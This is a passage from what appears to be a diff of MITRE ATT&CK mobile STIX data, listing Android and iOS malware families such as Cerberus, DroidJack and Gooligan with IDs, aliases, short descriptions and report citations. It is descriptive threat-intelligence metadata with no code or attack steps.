"malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "type": "malware", + "created": "2020-06-26T15:32:24.569Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0480", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. 
(2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-09-11T15:43:49.079Z", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "DroidJack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--05c4f87c-be8f-46ea-8d9a-2a0aad8f52c1", + "created": "2017-10-25T14:48:40.571Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0320", + "url": "https://attack.mitre.org/software/S0320" + }, + { + "source_name": "DroidJack", + "description": "(Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)" + }, + { + "source_name": "Proofpoint-Droidjack", + "url": "https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdoored-pokemon-go-android-app", + "description": "Proofpoint. (2016, July 7). DroidJack Uses Side-Load…It's Super Effective! Backdoored Pokemon GO Android App Found. Retrieved January 20, 2017." + }, + { + "source_name": "Zscaler-SuperMarioRun", + "url": "https://www.zscaler.com/blogs/security-research/super-mario-run-malware-2-droidjack-rat", + "description": "Viral Gandhi. (2017, January 12). Super Mario Run Malware #2 – DroidJack RAT. Retrieved January 20, 2017." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[DroidJack](https://attack.mitre.org/software/S0320) is an Android remote access tool that has been observed posing as legitimate applications including the Super Mario Run and Pokemon GO games. (Citation: Zscaler-SuperMarioRun) (Citation: Proofpoint-Droidjack)", + "modified": "2022-05-20T17:13:16.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "DroidJack", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Rotexy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "type": "malware", + "created": "2019-09-23T13:36:07.816Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0411", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0411" + }, + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." + } + ], + "modified": "2020-09-11T15:53:38.216Z", + "name": "Rotexy", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) is an Android banking malware that has evolved over several years. 
It was originally an SMS spyware Trojan first spotted in October 2014, and since then has evolved to contain more features, including ransomware functionality.(Citation: securelist rotexy 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Stealth Mango", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) is Android malware that has reportedly been used to successfully compromise the mobile devices of government officials, members of the military, medical professionals, and civilians. The iOS malware known as [Tangelo](https://attack.mitre.org/software/S0329) is believed to be from the same developer. (Citation: Lookout-StealthMango)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Stealth Mango" + ], + "type": "malware", + "id": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0328", + "external_id": "S0328" + }, + { + "source_name": "Stealth Mango", + "description": "(Citation: Lookout-StealthMango)" + }, + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. 
Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. 
Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "GoldenEagle" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "type": "malware", + "created": "2020-12-24T22:04:27.667Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0551", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0551" + }, + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2021-03-25T16:20:28.165Z", + "name": "GoldenEagle", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) is a piece of Android malware that has been used in targeting of Uyghurs, Muslims, Tibetans, individuals in Turkey, and individuals in China. 
Samples have been found as early as 2012.(Citation: Lookout Uyghur Campaign)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-21T18:53:30.817Z", + "name": "Bread", + "description": "[Bread](https://attack.mitre.org/software/S0432) was a large-scale billing fraud malware family known for employing many different cloaking and obfuscation techniques in an attempt to continuously evade Google Play Store’s malware detection. 1,700 unique Bread apps were detected and removed from the Google Play Store before being downloaded by users.(Citation: Google Bread)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_contributors": [ + "Sergey Persikov, Check Point", + "Jonathan Shimonovich, Check Point", + "Aviran Hazum, Check Point" + ], + "x_mitre_aliases": [ + "Bread", + "Joker" + ], + "type": "malware", + "id": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "created": "2020-05-04T14:04:55.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0432", + "external_id": "S0432" + }, + { + "source_name": "Joker", + "description": "(Citation: Google Bread)" + }, + { + "source_name": "Google Bread", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . 
Retrieved April 27, 2020.", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Judy", + "description": "[Judy](https://attack.mitre.org/software/S0325) is auto-clicking adware that was distributed through multiple apps in the Google Play Store. (Citation: CheckPoint-Judy)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--172444ab-97fc-4d94-b142-179452bfb760", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0325", + "external_id": "S0325" + }, + { + "source_name": "Judy", + "description": "(Citation: CheckPoint-Judy)" + }, + { + "source_name": "CheckPoint-Judy", + "description": "CheckPoint. (2017, May 25). The Judy Malware: Possibly the largest malware campaign found on Google Play. Retrieved September 18, 2018.", + "url": "https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "OldBoot", + "description": "[OldBoot](https://attack.mitre.org/software/S0285) is an Android malware family. 
(Citation: HackerNews-OldBoot)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--2074b2ad-612e-4758-adce-7901c1b49bbc", + "created": "2017-10-25T14:48:45.155Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0285", + "external_id": "S0285" + }, + { + "source_name": "OldBoot", + "description": "(Citation: HackerNews-OldBoot)" + }, + { + "source_name": "HackerNews-OldBoot", + "description": "Sudhir K Bansal. (2014, January 28). First widely distributed Android bootkit Malware infects more than 350,000 Devices. Retrieved December 21, 2016.", + "url": "http://thehackernews.com/2014/01/first-widely-distributed-android.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Gooligan", + "description": "[Gooligan](https://attack.mitre.org/software/S0290) is a malware family that runs privilege escalation exploits on Android devices and then uses its escalated privileges to steal authentication tokens that can be used to access data from many Google applications. [Gooligan](https://attack.mitre.org/software/S0290) has been described as part of the Ghost Push Android malware family. 
(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Gooligan", + "Ghost Push" + ], + "type": "malware", + "id": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "created": "2017-10-25T14:48:43.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0290", + "external_id": "S0290" + }, + { + "source_name": "Gooligan", + "description": "(Citation: Gooligan Citation) (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Ghost Push", + "description": "Gooligan has been described as being part of the Ghost Push Android malware family. (Citation: Ludwig-GhostPush) (Citation: Lookout-Gooligan)" + }, + { + "source_name": "Gooligan Citation", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016.", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/" + }, + { + "source_name": "Ludwig-GhostPush", + "description": "Adrian Ludwig. (2016, November 29). The fight against Ghost Push continues. Retrieved December 12, 2016.", + "url": "https://plus.google.com/+AdrianLudwig/posts/GXzJ8vaAFsi" + }, + { + "source_name": "Lookout-Gooligan", + "description": "Lookout. (2016, December 1). Ghost Push and Gooligan: One and the same. 
Retrieved December 12, 2016.", + "url": "https://blog.lookout.com/blog/2016/12/01/ghost-push-gooligan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "SpyNote RAT", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware's functionality. (Citation: Zscaler-SpyNote)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "SpyNote RAT" + ], + "type": "malware", + "id": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "created": "2017-10-25T14:48:45.794Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0305", + "external_id": "S0305" + }, + { + "source_name": "SpyNote RAT", + "description": "(Citation: Zscaler-SpyNote)" + }, + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Ohad Mana, Check Point", + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "TrickMo" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "type": "malware", + "created": "2020-04-24T17:46:31.111Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0427", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0427" + }, + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." + } + ], + "modified": "2020-09-11T15:57:37.561Z", + "name": "TrickMo", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) a 2FA bypass mobile banking trojan, most likely being distributed by [TrickBot](https://attack.mitre.org/software/S0266). 
[TrickMo](https://attack.mitre.org/software/S0427) has been primarily targeting users located in Germany.(Citation: SecurityIntelligence TrickMo)\n\n[TrickMo](https://attack.mitre.org/software/S0427) is designed to steal transaction authorization numbers (TANs), which are typically used as one-time passwords.(Citation: SecurityIntelligence TrickMo) ", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "INSOMNIA" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "type": "malware", + "created": "2020-06-02T14:32:31.461Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0463", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0463" + }, + { + "source_name": "Volexity Insomnia", + "url": "https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/", + "description": "A. Case, D. Lassalle, M. Meltzer, S. Koessel, et al.. (2020, April 21). Evil Eye Threat Actor Resurfaces with iOS Exploit and Updated Implant. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-24T18:24:35.433Z", + "name": "INSOMNIA", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) is spyware that has been used by the group Evil Eye.(Citation: Volexity Insomnia)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Dvmap" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "type": "malware", + "created": "2019-12-10T16:07:40.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0420", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0420" + }, + { + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019.", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "source_name": "SecureList DVMap June 2017" + } + ], + "modified": "2020-01-22T22:17:23.015Z", + "name": "Dvmap", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) is rooting malware that injects malicious code into system runtime libraries. 
It is credited with being the first malware that performs this type of code injection.(Citation: SecureList DVMap June 2017)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Zen" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "type": "malware", + "created": "2020-07-27T14:14:56.729Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0494", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494" + }, + { + "source_name": "Google Security Zen", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020." + } + ], + "modified": "2020-08-11T14:23:15.002Z", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "NotCompatible", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) is an Android malware family that was used between at least 2014 and 2016. It has multiple variants that have become more sophisticated over time. 
(Citation: Lookout-NotCompatible)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "created": "2017-10-25T14:48:36.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0299", + "external_id": "S0299" + }, + { + "source_name": "NotCompatible", + "description": "(Citation: Lookout-NotCompatible)" + }, + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. 
It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "XLoader for Android" + ], + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. 
Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "[Trojan-SMS.AndroidOS.FakeInst.a](https://attack.mitre.org/software/S0306) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--28e39395-91e7-4f02-b694-5e079c964da9", + "created": "2017-10-25T14:48:46.107Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0306", + "external_id": "S0306" + }, + { + "source_name": "Trojan-SMS.AndroidOS.FakeInst.a", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. 
Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "type": "malware", + "created": "2020-07-20T13:58:53.422Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0490", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020." + } + ], + "modified": "2021-12-07T14:46:08.852Z", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-04-13T22:33:55.061Z", + "name": "AbstractEmu", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) is mobile malware that was first seen in Google Play and other third-party stores in October 2021. 
It was discovered in 19 Android applications, of which at least 7 abused known Android exploits for obtaining root permissions. [AbstractEmu](https://attack.mitre.org/software/S1061) was observed primarily impacting users in the United States, however victims are believed to be across a total of 17 countries.(Citation: lookout_abstractemu_1021)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "AbstractEmu" + ], + "type": "malware", + "id": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "created": "2023-02-06T18:48:41.442Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1061", + "external_id": "S1061" + }, + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
